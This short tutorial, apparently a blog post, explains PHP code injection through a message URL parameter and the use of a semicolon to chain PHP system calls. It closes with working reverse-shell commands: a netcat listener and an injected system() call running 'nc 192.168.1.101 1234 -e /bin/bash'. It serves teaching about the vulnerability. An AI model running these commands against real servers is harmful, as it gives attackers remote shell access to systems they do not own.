PHP Code Injection
PHP code injection is a vulnerability that allows an attacker to inject custom code into the server side scripting engine.
Tools we will be using
If we click on the message, it echos data back. So we know the PHP code is executing correctly.
We can also see this in the URL, with the message parameter.
We can change the echo message, however, if we try other data like HTML tags (HTML Injection) we get no output.
So we have established that the message is being processed by the server.
If we insert a PHP statement terminator (semicolon) we can execute more commands with the PHP system call.
A great way of taking advantage of PHP code injection is by using the system call.
Getting a reverse shell
- Setup a netcat listener – nc -nvlp 1234
- Execute nc with system call – system(“nc 192.168.1.101 1234 -e /bin/bash”);
Share this post